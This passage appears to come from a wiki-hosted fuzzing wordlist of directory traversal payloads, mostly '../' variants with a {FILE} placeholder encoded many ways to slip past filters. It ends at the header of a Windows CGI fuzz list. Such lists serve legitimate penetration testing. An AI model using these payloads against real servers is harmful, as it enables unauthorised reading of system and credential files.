%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
